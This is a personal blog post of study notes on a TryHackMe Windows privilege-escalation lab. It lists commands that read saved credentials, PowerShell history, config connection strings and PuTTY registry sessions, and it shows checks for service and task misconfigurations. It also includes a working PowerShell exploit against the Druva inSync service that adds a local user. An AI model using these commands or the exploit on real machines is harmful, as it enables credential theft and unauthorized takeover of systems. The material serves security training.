Post

TryHackMe - Windows Privilege Escalation

Posted Updated
By cyberpunk.d31ty
1 min read
TryHackMe - Windows Privilege Escalation

THM-Windows Privilege Escalation

Enumeration and Information Gathering

  • Windows Pro - Uses Bitlocker encryption
  • Find Account details using the command: lusrmgr.msc
  • The SYSTEM account has more privileges than the Administrator user
    Powershell History:
    1

    type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    Saved Windows Credentials:
    1
2

    cmdkey /list
runas /savecred /user:admin cmd.exe
    IIS Configuration
    1

    type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
    Retrieve Credentials
    Example Software:
    1

    reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
    Scheduled Tasks
    1

    schtasks /query /tn vulntask /fo list /v
    File permissions of exe
    1

    icacls c:\tasks\schtask.bat
    Windows Services
    1

    sc qc apphostsvc

    apphostsvc - example command to check service config

    Abusing Service Misconfiguration

    Services have a Discretionary Access Control List (DACL), which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service, amongst other privileges. The DACL can be seen from Process Hacker (available on your machine’s desktop):

  • All of the services configurations are stored on the registry under HKLM\SYSTEM\CurrentControlSet\Services\

    Unquoted Service Paths

    1

    sc qc "disk sorter enterprise"

    Insecure Service Permissions

    1

    accesschk64.exe -qlc thmservice
    Windows Privileges
    1

    whoami /priv

Tool: https://github.com/gtworek/Priv2Admin

Official Doc: https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants

SeBackup and SeRestore

Awesome command exploitation tbh

Abusing Vulnerable Software

1

wmic product get name,version,vendor

Exploit Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Tools:

  1. WinPeas
  2. PrivCheck:
  3. WES-NG: Windows Exploit Suggester

Resources:

  1. Windows Local Priv-Esc
  2. Token Kidanapping
  3. Decoder
  4. Potates Windows Priv
  5. RoguesWinRM
  6. Priv2Admin
  7. Payload of Things - Windows Privs
THM, Learning
THM
This post is licensed under CC BY 4.0 by the author.